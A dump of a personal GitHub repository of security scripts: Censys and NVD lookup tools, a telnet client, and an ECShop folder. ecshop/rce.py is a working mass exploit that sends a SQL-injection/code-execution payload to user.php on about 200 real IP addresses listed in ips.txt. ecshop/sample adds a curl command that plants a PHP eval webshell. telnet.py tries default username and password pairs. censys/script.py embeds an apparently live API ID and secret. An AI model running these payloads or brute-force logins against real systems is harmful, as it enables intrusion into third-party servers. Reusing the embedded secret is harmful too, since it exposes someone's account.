├── README.md ├── _config.yml ├── censys ├── README.md ├── __init__.py ├── censys.txt └── script.py ├── ecshop ├── __init__.py ├── ips.txt ├── rce.py └── sample ├── telnet ├── README.md └── telnet.py └── vul-info-collect ├── .DS_Store ├── README.md ├── __init__.py ├── list.css ├── mysql 5.7.21 ├── cve.html └── list.css ├── sample.png └── script.py /README.md: -------------------------------------------------------------------------------- 1 | # scripts 2 | 主要是收集自己编写、改造的一些小的脚本 3 | 4 | ## 更新日志 5 | 6 |
7 | 2021.10.15 ~ crt_check 8 | 批量自动化检查目标系统证书是否过期
9 | 独立项目连接:https://github.com/starnightcyber/crt_check 10 |
11 | 12 |
13 | 2020.12.13 ~ masnmap 14 | masscan + nmap 快速端口存活检测和服务识别。
15 | 独立项目连接:https://github.com/starnightcyber/masnmap 16 |
17 | 18 | 19 |
20 | 2020.4.19 ~ Nessus_to_report 21 | Nessus_to_report Nessus报告转中文,脚本更新至Python3
22 | 独立项目连接:https://github.com/starnightcyber/Nessus_to_report 23 |
24 | 25 |
26 | 2020.4.16 ~ ZoomEye 27 | ZoomEye脚本更新至Python3
28 | 独立项目连接:https://github.com/starnightcyber/ZoomEye 29 |
30 | 31 |
32 | 2020.4.13 ~ telnet 33 | Telnet客户端类,处理基本的登陆,执行命令,请随意改造。 34 |
35 | 36 |
37 | 2020.3.17 ~ cve_for_today 38 | 获取每日更新的CVE漏洞信息。
39 | 独立项目连接:https://github.com/starnightcyber/cve_for_today 40 |
41 | 42 |
43 | 2020.1.18 ~ vul-info-collect 44 | 从美国国家漏洞库NVD获取某个特定版本软件的漏洞统计信息 45 | 46 | 独立项目连接:https://github.com/starnightcyber/vul-info-collect 47 |
48 | 49 |
50 | 2018.10.31 ~ vul-info-collect 51 | 从NVD获取关于某个版本软件的漏洞信息。 52 | 53 | 博客链接:[获取某个版本软件存在的漏洞信息](https://www.cnblogs.com/Hi-blog/p/vulnerabilities-with-specific-version-of-software.html) 54 |
55 | 56 |
57 | 2018.1.30 ~ ip-reverse-to-domain 58 | ip到域名的反向解析,有一些在线工具可供使用,这个提供解析服务的站点好像之前挂过,不确定是否可以使用 59 | 60 | 项目地址:[ip-reverse-to-domain](https://github.com/starnightcyber/ip-reverse-to-domain) 61 |
62 | 63 |
64 | 2018.1.30 ~ findSubDomains 65 | 子域名爆破脚本 66 | 67 | 讲道理速度很快并且爆破出的域名和对应ip地址应该都有效 68 | 69 | 项目地址:[findSubDomains](https://github.com/starnightcyber/findSubDomains) 70 | 71 | 博客链接:[子域名爆破](http://www.cnblogs.com/Hi-blog/p/7606027.html) 72 |
73 | 74 | 75 |
76 | 2018.1.30 ~ Shodan 77 | Shodan 网络空间搜索引擎鼻祖,大家都懂 : https://www.shodan.io/ 78 | 79 | 项目地址:[Shodan](https://github.com/starnightcyber/Shodan) 80 | 81 | 博客链接:[Shodan 使用](http://www.cnblogs.com/Hi-blog/p/6904190.html) 82 |
83 | 84 |
85 | 2018.1.30 ~ ZoomEye 86 | ZoomEye 是国内的一款网络空间搜索引擎,很强和暴力,不多介绍:https://www.zoomeye.org/ 87 | 88 | 项目地址:[ZoomEye](https://github.com/starnightcyber/ZoomEye) 89 | 90 | 博客链接:[从ZoomEye API 到 Weblogic 弱口令扫描](http://www.cnblogs.com/Hi-blog/p/6127387.html) 91 |
92 | 93 |
94 | 2017.11.27 ~ Censys 95 | censys 是一款网络空间搜索引擎 https://censys.io 96 | 97 | 跟Shodan和ZoomEye等搜索引擎类似,目前可以免费使用,目前商业版也正在推出 98 | 99 | 关于Censys更详细的介绍,请参考博客:[Censys](http://www.cnblogs.com/Hi-blog/p/7798940.html "Censys") 100 |
101 | -------------------------------------------------------------------------------- /_config.yml: -------------------------------------------------------------------------------- 1 | theme: jekyll-theme-hacker -------------------------------------------------------------------------------- /censys/README.md: -------------------------------------------------------------------------------- 1 | 2 | ## 简介 3 | censys 是一款网络空间搜索引擎 https://censys.io 4 | 5 | 跟Shodan和ZoomEye等搜索引擎类似,目前可以免费使用,目前商业版也正在推出 6 | 7 | 关于Censys更详细的介绍,请参考博客:[Censys](http://www.cnblogs.com/Hi-blog/p/7798940.html) 8 | 9 | ## Sample 10 | 11 | starnight:censys starnight$ python script.py 12 | please input query string : "weblogic" 13 | ('---', 'weblogic', '---') 14 | Total_count:11836 15 | please input file name to save data (censys.txt default) : "weblogic" 16 | page :1 17 | Total_count:1183 18 | 46.244.104.198:80 19 | 46.244.104.198:8080 20 | 31.134.202.10:2323 21 | 31.134.202.10:80 22 | 31.134.202.10:8080 23 | 31.134.203.85:2323 24 | 31.134.203.85:80 25 | 31.134.203.85:8080 26 | 31.134.205.92:2323 27 | 31.134.205.92:80 28 | 31.134.205.92:8080 29 | 31.134.206.202:2323 30 | 31.134.206.202:80 31 | 31.134.206.202:8080 32 | 31.134.201.249:80 33 | 31.134.201.249:8080 34 | 31.134.202.233:80 35 | 31.134.202.233:8080 36 | 31.134.200.94:80 37 | 31.134.200.94:8080 38 | 31.134.201.248:80 39 | 31.134.201.248:8080 40 | 31.134.200.6:80 41 | 31.134.200.6:8080 42 | 46.244.105.216:80 43 | 46.244.105.216:8080 44 | 31.134.206.131:80 45 | 31.134.206.131:2323 46 | 31.134.206.131:8080 47 | 31.134.204.127:80 48 | 31.134.204.127:8080 49 | 46.244.10.173:80 50 | 46.244.10.173:23 51 | 46.244.10.173:8080 52 | 31.134.202.82:80 53 | 31.134.202.82:8080 54 | 46.244.105.252:80 55 | 46.244.105.252:2323 56 | 46.244.105.252:8080 57 | 31.134.205.186:2323 58 | 31.134.205.186:80 59 | 31.134.205.186:8080 60 | 31.134.204.223:80 61 | 31.134.204.223:8080 62 | 31.134.207.182:2323 63 | 31.134.207.182:80 64 | 31.134.207.182:8080 65 | -------------------------------------------------------------------------------- /censys/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/starnightcyber/scripts/9432d9f6a170b9d873ed97e970a7c9475303498e/censys/__init__.py -------------------------------------------------------------------------------- /censys/script.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | 4 | import sys 5 | import json 6 | import requests 7 | import time 8 | 9 | API_URL = "https://www.censys.io/api/v1" 10 | UID = "aa7c1f3a-b6ab-497d-9788-5e9e4898a655" 11 | SECRET = "rSEvCfRQexNKXmpx940DQXWExWAFjkt1" 12 | page = 1 13 | PAGES = 2 # the pages you want to fetch 14 | 15 | 16 | def getIp(query, page): 17 | ''' 18 | Return ips and total amount when doing query 19 | ''' 20 | iplist = [] 21 | data = { 22 | "query": query, 23 | "page": page, 24 | "fields": ["ip", "protocols", "location.country"] 25 | } 26 | try: 27 | res = requests.post(API_URL + "/search/ipv4", data=json.dumps(data), auth=(UID, SECRET)) 28 | 29 | except: 30 | pass 31 | try: 32 | results = res.json() 33 | except: 34 | pass 35 | if res.status_code != 200: 36 | print("error occurred: %s" % results["error"]) 37 | sys.exit(1) 38 | # total query result 39 | # iplist.append("Total_count:%s" % (results["metadata"]["count"])) 40 | 41 | # add result in some specific form 42 | for result in results["results"]: 43 | for i in result["protocols"]: 44 | # iplist.append(result["ip"] + ':' + i + ' in ' + result["location.country"][0]) 45 | iplist.append(result["ip"] + ':' + i) 46 | # return ips and total count 47 | return iplist, results["metadata"]["count"] 48 | 49 | 50 | if __name__ == '__main__': 51 | 52 | query = input('please input query string : ') 53 | print('---', query, '---') 54 | ips, num = getIp(query=query, page=page) 55 | 56 | print("Total_count:%s" % num) 57 | 58 | dst = input('please input file name to save data (censys.txt default) : ') 59 | 60 | # 保存数据到文件 61 | if dst: 62 | dst = dst + '.txt' 63 | else: 64 | dst = 'censys.txt' 65 | 66 | # get result and save to file page by page 67 | with open(dst, 'a') as f: 68 | while page <= PAGES: 69 | print('page :' + str(page)) 70 | iplist, num = (getIp(query=query, page=page)) 71 | page += 1 72 | 73 | for i in iplist: 74 | print i[:i.find('/')] 75 | 76 | for i in iplist: 77 | f.write(i[:i.find('/')] + '\n') 78 | time.sleep(3) 79 | print('Finished. data saved to file', dst) 80 | -------------------------------------------------------------------------------- /ecshop/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/starnightcyber/scripts/9432d9f6a170b9d873ed97e970a7c9475303498e/ecshop/__init__.py -------------------------------------------------------------------------------- /ecshop/ips.txt: -------------------------------------------------------------------------------- 1 | 54.223.184.91:80 2 | 54.65.116.232:80 3 | 54.223.208.255:80 4 | 54.223.202.126:80 5 | 54.223.213.120:80 6 | 54.223.219.33:80 7 | 54.223.204.56:80 8 | 58.64.143.240:443 9 | 58.215.76.27:443 10 | 123.233.118.21:8080 11 | 123.57.91.18:8080 12 | 123.58.133.42:8080 13 | 60.250.51.94:80 14 | 60.205.215.172:80 15 | 60.174.234.7:80 16 | 60.174.234.112:80 17 | 60.251.118.245:80 18 | 60.199.243.180:80 19 | 60.248.187.50:80 20 | 60.173.245.244:80 21 | 60.205.180.63:80 22 | 60.6.234.111:80 23 | 60.205.156.56:80 24 | 60.205.114.84:80 25 | 60.205.123.114:80 26 | 60.250.51.91:80 27 | 60.161.14.95:80 28 | 121.199.13.180:88 29 | 198.55.121.113:443 30 | 198.20.83.74:443 31 | 198.2.205.60:443 32 | 198.1.115.121:443 33 | 211.149.202.23:81 34 | 36.102.220.44:82 35 | 139.224.64.155:443 36 | 139.198.124.213:443 37 | 139.196.252.220:443 38 | 139.129.200.231:443 39 | 139.196.176.28:443 40 | 139.198.126.92:443 41 | 139.162.108.158:443 42 | 139.196.114.108:443 43 | 139.129.218.155:443 44 | 173.254.231.80:443 45 | 122.112.210.197:82 46 | 123.206.63.118:8010 47 | 140.143.100.101:443 48 | 140.207.158.60:443 49 | 219.138.105.202:8090 50 | 72.41.84.202:80 51 | 114.215.238.190:81 52 | 116.62.128.52:8088 53 | 198.55.121.113:80 54 | 198.2.206.239:80 55 | 198.27.87.230:80 56 | 43.247.176.115:8080 57 | 47.106.112.73:8080 58 | 61.164.161.42:8080 59 | 61.155.60.188:8080 60 | 61.163.95.250:8080 61 | 116.255.250.98:8081 62 | 116.255.250.64:8081 63 | 121.46.128.248:8080 64 | 121.201.66.149:8080 65 | 113.106.89.242:8080 66 | 115.28.174.58:8080 67 | 116.255.185.187:8080 68 | 116.255.185.161:8080 69 | 116.255.185.169:8080 70 | 116.255.185.172:8080 71 | 116.255.185.175:8080 72 | 116.255.185.160:8080 73 | 116.255.185.179:8080 74 | 116.255.185.165:8080 75 | 116.255.185.166:8080 76 | 116.255.185.182:8080 77 | 116.255.185.177:8080 78 | 116.255.185.168:8080 79 | 116.255.185.180:8080 80 | 116.255.185.163:8080 81 | 116.255.229.106:8080 82 | 116.255.185.184:8080 83 | 116.255.185.183:8080 84 | 116.255.185.185:8080 85 | 116.62.195.29:8080 86 | 116.255.185.174:8080 87 | 118.178.225.118:8080 88 | 118.193.203.154:8080 89 | 119.90.149.200:8080 90 | 122.14.200.53:8080 91 | 124.164.241.171:8080 92 | 124.133.228.144:8080 93 | 139.224.3.96:8080 94 | 222.73.135.210:8080 95 | 205.209.185.36:8083 96 | 139.199.19.123:8888 97 | 140.207.114.214:8090 98 | 117.34.70.140:443 99 | 117.41.235.168:443 100 | 120.25.105.14:8088 101 | 120.25.223.215:8088 102 | 120.24.75.187:8088 103 | 112.124.26.5:5000 104 | 119.180.20.209:8000 105 | 118.24.133.227:443 106 | 118.123.17.178:443 107 | 118.23.162.143:443 108 | 118.190.101.215:443 109 | 118.31.249.220:443 110 | 118.193.189.93:443 111 | 118.193.189.94:443 112 | 118.25.38.74:443 113 | 118.123.18.98:443 114 | 118.89.46.63:443 115 | 118.25.119.182:443 116 | 120.79.174.15:8002 117 | 101.201.122.19:81 118 | 13.228.94.125:80 119 | 13.229.21.16:80 120 | 13.113.239.161:80 121 | 13.228.118.154:80 122 | 13.113.65.254:80 123 | 13.113.8.25:80 124 | 13.75.94.228:80 125 | 13.229.161.92:80 126 | 13.228.232.15:80 127 | 13.124.140.255:80 128 | 13.75.120.16:80 129 | 13.94.47.234:80 130 | 13.75.46.187:80 131 | 13.112.27.57:80 132 | 13.228.129.107:80 133 | 13.250.173.205:80 134 | 13.251.38.215:80 135 | 13.112.194.18:80 136 | 13.113.149.110:80 137 | 13.115.154.185:80 138 | 13.250.124.140:80 139 | 118.139.188.163:80 140 | 118.24.23.121:80 141 | 118.24.17.179:80 142 | 118.190.149.8:80 143 | 118.184.23.254:80 144 | 118.178.185.188:80 145 | 118.31.249.220:80 146 | 118.89.46.63:80 147 | 118.184.64.99:80 148 | 118.190.151.184:80 149 | 118.89.187.145:80 150 | 118.184.30.251:80 151 | 118.190.140.40:80 152 | 118.140.0.238:80 153 | 118.190.75.41:80 154 | 118.190.208.99:80 155 | 118.244.234.181:80 156 | 118.89.170.109:80 157 | 118.31.76.95:80 158 | 118.190.104.157:80 159 | 118.23.162.143:80 160 | 118.144.133.74:80 161 | 118.31.102.227:80 162 | 118.193.189.94:80 163 | 118.26.135.62:80 164 | 118.178.195.50:80 165 | 118.190.70.58:80 166 | 118.178.152.222:80 167 | 118.190.145.41:80 168 | 118.178.125.213:80 169 | 223.112.5.42:80 170 | 223.26.62.245:80 171 | 223.26.50.31:80 172 | 223.26.49.228:80 173 | 223.93.185.53:80 174 | 223.4.92.17:80 175 | 223.26.49.239:80 176 | 1.234.20.78:80 177 | 1.34.241.117:80 178 | 1.34.157.105:80 179 | 1.171.55.153:80 180 | 111.30.66.29:8090 181 | 13.112.135.89:80 182 | 13.228.201.159:80 183 | 171.34.77.29:80 184 | 23.249.181.228:80 185 | 23.97.74.84:80 186 | 23.102.224.231:80 187 | 23.97.74.96:80 188 | 23.102.232.51:80 189 | 27.223.97.172:80 190 | 27.105.106.55:80 191 | 36.111.197.135:80 192 | 39.106.151.108:80 193 | 39.105.124.197:80 194 | 39.106.19.179:80 195 | 39.108.102.190:80 196 | 39.108.105.219:80 197 | 39.108.172.180:80 198 | 39.108.182.29:80 199 | 39.108.246.219:80 200 | 39.106.140.151:80 -------------------------------------------------------------------------------- /ecshop/rce.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | 4 | """ 5 | references: 6 | https://www.anquanke.com/post/id/158677 7 | http://www.freebuf.com/vuls/182899.html 8 | """ 9 | 10 | import os 11 | import requests 12 | 13 | payload = ''' --connect-timeout 10 -m 20 -d 'action=login&vulnspy=phpinfo();exit;' -H 'Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'"'"'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca' 14 | ''' 15 | succeed = set() 16 | 17 | 18 | def attack(ip_port): 19 | # step 1 : construct target url 20 | # distinguish http/https 21 | proto = 'http' 22 | if ':' in ip_port: 23 | ip, port = ip_port.split(':') 24 | if port == '443': 25 | proto = 'https' 26 | 27 | target = '{}://{}/user.php'.format(proto, ip_port) 28 | 29 | # step 2 : construct command to execute 30 | cmd = 'curl {} {}'.format(target, payload) 31 | try: 32 | # step 3: execute curl command 33 | result = os.popen(cmd).read() 34 | 35 | # step 4: check whether vulnerable 36 | cmd2 = '{}://{}/vulnspy.php?vulnspy=phpinfo();'.format(proto, ip_port) 37 | request = requests.get(cmd2, timeout=15) 38 | 39 | print(request.status_code) 40 | print() 41 | if request.status_code == 200 and 'PHP Version' in request.text: 42 | msg = '{} is vulnerable to rce\n'.format(ip_port) 43 | succeed.add(ip_port) 44 | print(msg) 45 | except: 46 | pass 47 | 48 | 49 | if __name__ == '__main__': 50 | # target = '*.*.*.*' 51 | i = 1 52 | with open('ips.txt', 'r') as fr: 53 | for line in fr.readlines(): 54 | target = line.strip() 55 | print('%d : checkng %s' % (i, target)) 56 | i += 1 57 | attack(target) 58 | 59 | if len(succeed) != 0: 60 | print('\n\n\n------ following hosts are vulnerable --------') 61 | for line in succeed: 62 | print(line) 63 | 64 | -------------------------------------------------------------------------------- /ecshop/sample: -------------------------------------------------------------------------------- 1 | 2 | curl http://***/user.php -d 'action=login&vulnspy=phpinfo();exit;' -H 'Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'"'"'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca' 3 | 4 | 5 | curl http://***/user.php -d 'action=login&vulnspy=eval(base64_decode($_POST[d]));exit;&d=ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbCgkX1JFUVVFU1RbdnVsbnNweV0pOz8%2BJyk7' -H 'Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'"'"'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca' 6 | 7 | 8 | http://*.*.*/vulnspy.php?vulnspy=phpinfo(); 9 | 10 | 11 | -------------------------------------------------------------------------------- /telnet/README.md: -------------------------------------------------------------------------------- 1 | # TelnetClient 2 | TelnetClient类,处理Telnet客户端相关,如最基本的登录和执行命令。 3 | 4 | ## Telnet登陆认证相关 5 | 6 | ``` 7 | auth = { 8 | "user_prompt": b'Username:', # 输入用户名提示 9 | "password_prompt": b'Password:', # 输入密码提示 10 | "enter": b'\r', # 回车 11 | "remote_enter": b'\n\r', 12 | } 13 | ``` 14 | 有一点请注意,标准输入结尾是换行'\n',也有一些是回车'\r'。 15 | 16 | ## Sample 17 | 仅供演示,脚本请自己改造。 18 | 19 | ``` 20 | # python3 telnet_brute.py 21 | trying to login 172.16.176.120:2570 telnet service 22 | try user:[admin], password:[admin] 23 | try user:[aaa], password:[bbb] 24 | try user:[], password:[] 25 | 登录成功 26 | ==> ver 27 | Version :PAS_SIPPROXY_6.0.0.3.0.190831, Compile Time: 16:18:41, Feb 25 2020 28 | Return value: 1 29 | SipPrxoy-> 30 | ``` 31 | 以上! -------------------------------------------------------------------------------- /telnet/telnet.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | 4 | import logging 5 | import telnetlib 6 | import time 7 | 8 | 9 | # telnet登录认证相关 10 | auth = { 11 | "user_prompt": b'Username:', # 输入用户名提示 12 | "password_prompt": b'Password:', # 输入密码提示 13 | "enter": b'\r', # 回车 14 | "remote_enter": b'\n\r', 15 | } 16 | 17 | 18 | class TelnetClient(object): 19 | def __init__(self): 20 | self.tn = telnetlib.Telnet() # Telnet client 21 | 22 | def login(self, ip, port, tel_dict): 23 | """ 24 | telnet 登录 25 | :param ip: 目标ip 26 | :param port: 目标端口 27 | :param tel_dict: 密码字典 28 | :return: 登录成功(True) or 登录失败(False) 29 | """ 30 | msg = 'trying to login {}:{} telnet service'.format(ip, port) 31 | print(msg) 32 | 33 | # telnet登录 34 | for username, password in tel_dict.items(): 35 | 36 | # 创建一个telnet连接 37 | try: 38 | self.tn.open(ip, port) 39 | except: 40 | logging.warning('%s网络连接失败' % ip) 41 | return False, '' 42 | 43 | msg = 'try user:[{}], password:[{}]'.format(username, password) 44 | print(msg) 45 | 46 | # 登录尝试 47 | try: 48 | # 等待输入用户名提示user_prompt出现后,输入用户名 49 | self.tn.read_until(auth['user_prompt'], timeout=3) 50 | self.tn.write(username.encode('ascii') + auth['enter']) 51 | 52 | # 等待输入密码提示password_prompt出现后,输入密码 53 | self.tn.read_until(auth['password_prompt'], timeout=3) 54 | self.tn.write(password.encode('ascii') + auth['enter']) 55 | 56 | # 延时两秒再收取返回结果,给服务端足够响应时间 57 | time.sleep(2) 58 | 59 | # 获取登录结果, read_very_eager()获取到的是的是上次获取之后本次获取之前的所有输出 60 | command_result = self.tn.read_very_eager().decode('ascii') 61 | # print('===>', command_result) 62 | prompt, _ = command_result.split('->') 63 | # print('===>', prompt.strip()) 64 | 65 | # 如果返回的结果中没有提示输入用户名,表示登录成功 66 | if auth['user_prompt'] not in command_result.encode('ascii'): 67 | print('登录成功') 68 | return True 69 | else: 70 | continue 71 | except: 72 | pass 73 | return False 74 | 75 | def execute_command(self, command): 76 | """ 77 | 执行一些命令 78 | :param command: 要执行的命令 79 | :return: None 80 | """ 81 | try: 82 | self.tn.write(command.encode('ascii') + auth['enter']) 83 | time.sleep(2) 84 | # 获取命令结果 85 | command_result = self.tn.read_very_eager().decode('ascii') 86 | print('==>', command_result) 87 | except: 88 | print('something went wrong...') 89 | pass 90 | 91 | # 退出telnet,保留 92 | def logout_host(self): 93 | self.tn.write(b"bye\r") 94 | 95 | if __name__ == '__main__': 96 | 97 | # 参数 98 | ip = '172.16.176.120' 99 | port = '2570' 100 | tel_dict = {'admin': 'admin', 'aaa': 'bbb', '': ''} 101 | 102 | # 登陆 103 | tn = TelnetClient() 104 | tn.login(ip, port, tel_dict) 105 | 106 | # 执行命令 107 | command = 'ver' 108 | tn.execute_command(command) 109 | 110 | # 退出 111 | tn.logout_host() -------------------------------------------------------------------------------- /vul-info-collect/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/starnightcyber/scripts/9432d9f6a170b9d873ed97e970a7c9475303498e/vul-info-collect/.DS_Store -------------------------------------------------------------------------------- /vul-info-collect/README.md: -------------------------------------------------------------------------------- 1 | # vul-info-collect 2 | 3 | 从NVD获取关于某个版本软件的漏洞信息。 4 | 5 | 博客链接:[获取某个版本软件存在的漏洞信息](https://www.cnblogs.com/Hi-blog/p/vulnerabilities-with-specific-version-of-software.html) 6 | 7 | ## Sample 8 | 9 | ![image](https://github.com/starnightcyber/scripts/blob/master/vul-info-collect/sample.png) 10 | 11 | -------------------------------------------------------------------------------- /vul-info-collect/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/starnightcyber/scripts/9432d9f6a170b9d873ed97e970a7c9475303498e/vul-info-collect/__init__.py -------------------------------------------------------------------------------- /vul-info-collect/list.css: -------------------------------------------------------------------------------- 1 | body{background: #f5f5f5;margin: 0px; margin-top: -20px;padding: 0px;}#div_title{ background: #2171c2; color: #fff; height: 60px; box-shadow: 0 .25em .75em #CCC; padding-top: 15px; margin-top: 0px; font-family: "Microsoft Yahei" normal; font-size: 12px; z-index: 20; position: fixed; width: 100%;}#div_title_inner{ width: 1004px; margin-left: auto; margin-right: auto;}#div_title h2{ width: 130px; display: inline-block; float: right; margin-top: 3.5%;}#div_title h1{ font-weight: normal; margin-left: auto; margin-right: auto; display: inline-block; font-family: "Microsoft YaHei" !important;}#div_title_occupy{ height: 69px;}#div_main{width: 1004px;font-family: "Microsoft Yahei",helvetica,'Lucida Grande',Tahoma,Verdana,Simsun,Arial,Clean;margin-left: auto;margin-right: auto; margin-top: 15px;}#div_content{ position: fixed; width: 250px; overflow-y:scroll; height:520px; overflow: auto; background-color: #f2f2f2; padding-left: 15px; margin-top: 2px;}#div_content_body h3{ height: 10px;}#div_body{ margin-left: 250px; width: 824px; overflow: auto}#example_div{width: 650px;border: 1px dashed #cecfcf;background : #f5f6f7;font-family: Consolas,Menlo,"Liberation Mono",Courier,monospace!important;padding-left: 2px;padding-top: 5px;padding-bottom: 5px;font-size: 13px;min-height: 50px;}#uri_list_div a { color: #5f940a; text-decoration: none; font-size: 13px; height: 10px}#uri_list_div a:hover{ text-decoration: underline;}#data_style{ width:70px;}table.uri_t td{padding-left: 10px; width: 550px;}table.t { font-size: 13px; margin-top: 5px; margin-bottom: 5px; width: 655px; border: 1px solid #e4e4e4; border-right: 0; border-collapse: collapse;}table.t tr { min-height: 25px; line-height: 20px;}table.t th { background-color: #efefef; text-align: center; border-right: 1px solid #e4e4e4; border-bottom: 1px solid #e4e4e4; color: #000;}table.t td { border-right: 1px solid #e4e4e4; border-bottom: 1px solid #e4e4e4; color: #000; background-color: #fff; text-align: left; padding-left: 5px;}#div_get, #div_post, #div_push{ background-color: #fff; box-shadow: 0 2px 5px 0 rgba(0,0,0,.26); padding: 64px; margin: 2px 20px 20px 20px;} -------------------------------------------------------------------------------- /vul-info-collect/mysql 5.7.21/cve.html: -------------------------------------------------------------------------------- 1 | CVEs

CVEs for mysql 5.7.21

漏洞列表

CVE-2018-3286    中
CVE-2018-3284    中
CVE-2018-3283    中
CVE-2018-3282    中
CVE-2018-3279    中
CVE-2018-3278    中
CVE-2018-3277    中
CVE-2018-3276    中
CVE-2018-3251    中
CVE-2018-3247    中
CVE-2018-3212    中
CVE-2018-3203    中
CVE-2018-3200    中
CVE-2018-3195    中
CVE-2018-3187    中
CVE-2018-3186    中
CVE-2018-3185    中
CVE-2018-3182    中
CVE-2018-3174    中
CVE-2018-3173    中
CVE-2018-3171    中
CVE-2018-3170    中
CVE-2018-3162    中
CVE-2018-3161    中
CVE-2018-3156    中
CVE-2018-3155    高
CVE-2018-3145    中
CVE-2018-3144    中
CVE-2018-3143    中
CVE-2018-3137    中
CVE-2018-3133    中
CVE-2018-3084    低
CVE-2018-3082    低
CVE-2018-3081    中
CVE-2018-3080    中
CVE-2018-3079    中
CVE-2018-3078    中
CVE-2018-3077    中
CVE-2018-3075    中
CVE-2018-3074    中
CVE-2018-3073    中
CVE-2018-3071    中
CVE-2018-3070    中
CVE-2018-3067    中
CVE-2018-3066    低
CVE-2018-3065    中
CVE-2018-3064    高
CVE-2018-3062    中
CVE-2018-3061    中
CVE-2018-3060    中
CVE-2018-3058    中
CVE-2018-3056    中
CVE-2018-3054    中
CVE-2018-2767    低
CVE-2018-2846    中
CVE-2018-2839    中
CVE-2018-2819    中
CVE-2018-2818    中
CVE-2018-2817    中
CVE-2018-2816    中
CVE-2018-2813    中
CVE-2018-2812    中
CVE-2018-2810    中
CVE-2018-2787    中
CVE-2018-2786    中
CVE-2018-2784    中
CVE-2018-2782    中
CVE-2018-2781    中
CVE-2018-2780    中
CVE-2018-2779    中
CVE-2018-2778    中
CVE-2018-2777    中
CVE-2018-2776    中
CVE-2018-2775    中
CVE-2018-2773    中
CVE-2018-2771    中
CVE-2018-2769    中
CVE-2018-2766    中
CVE-2018-2762    中
CVE-2018-2761    中
CVE-2018-2759    中
CVE-2018-2758    中
CVE-2018-2755    高
等级 严重 高危 中危 低危
个数(83) 0 3 76 4
-------------------------------------------------------------------------------- /vul-info-collect/mysql 5.7.21/list.css: -------------------------------------------------------------------------------- 1 | body{background: #f5f5f5;margin: 0px; margin-top: -20px;padding: 0px;}#div_title{ background: #2171c2; color: #fff; height: 60px; box-shadow: 0 .25em .75em #CCC; padding-top: 15px; margin-top: 0px; font-family: "Microsoft Yahei" normal; font-size: 12px; z-index: 20; position: fixed; width: 100%;}#div_title_inner{ width: 1004px; margin-left: auto; margin-right: auto;}#div_title h2{ width: 130px; display: inline-block; float: right; margin-top: 3.5%;}#div_title h1{ font-weight: normal; margin-left: auto; margin-right: auto; display: inline-block; font-family: "Microsoft YaHei" !important;}#div_title_occupy{ height: 69px;}#div_main{width: 1004px;font-family: "Microsoft Yahei",helvetica,'Lucida Grande',Tahoma,Verdana,Simsun,Arial,Clean;margin-left: auto;margin-right: auto; margin-top: 15px;}#div_content{ position: fixed; width: 250px; overflow-y:scroll; height:520px; overflow: auto; background-color: #f2f2f2; padding-left: 15px; margin-top: 2px;}#div_content_body h3{ height: 10px;}#div_body{ margin-left: 250px; width: 824px; overflow: auto}#example_div{width: 650px;border: 1px dashed #cecfcf;background : #f5f6f7;font-family: Consolas,Menlo,"Liberation Mono",Courier,monospace!important;padding-left: 2px;padding-top: 5px;padding-bottom: 5px;font-size: 13px;min-height: 50px;}#uri_list_div a { color: #5f940a; text-decoration: none; font-size: 13px; height: 10px}#uri_list_div a:hover{ text-decoration: underline;}#data_style{ width:70px;}table.uri_t td{padding-left: 10px; width: 550px;}table.t { font-size: 13px; margin-top: 5px; margin-bottom: 5px; width: 655px; border: 1px solid #e4e4e4; border-right: 0; border-collapse: collapse;}table.t tr { min-height: 25px; line-height: 20px;}table.t th { background-color: #efefef; text-align: center; border-right: 1px solid #e4e4e4; border-bottom: 1px solid #e4e4e4; color: #000;}table.t td { border-right: 1px solid #e4e4e4; border-bottom: 1px solid #e4e4e4; color: #000; background-color: #fff; text-align: left; padding-left: 5px;}#div_get, #div_post, #div_push{ background-color: #fff; box-shadow: 0 2px 5px 0 rgba(0,0,0,.26); padding: 64px; margin: 2px 20px 20px 20px;} -------------------------------------------------------------------------------- /vul-info-collect/sample.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/starnightcyber/scripts/9432d9f6a170b9d873ed97e970a7c9475303498e/vul-info-collect/sample.png -------------------------------------------------------------------------------- /vul-info-collect/script.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | 4 | import requests 5 | import re 6 | from bs4 import BeautifulSoup 7 | import math 8 | 9 | 10 | class CveObject: 11 | cve_no = '' # 漏洞编号 12 | cve_url = '' # 漏洞cve url链接地址 13 | cve_nvd_url = '' # 漏洞nvd url链接地址 14 | cve_description = '' # 漏洞描述 15 | cve_create_time = '' # 创建时间 16 | cve_modify_time = '' # 修改时间 17 | cve_level = '' # 威胁等级 18 | cve_score = '' # 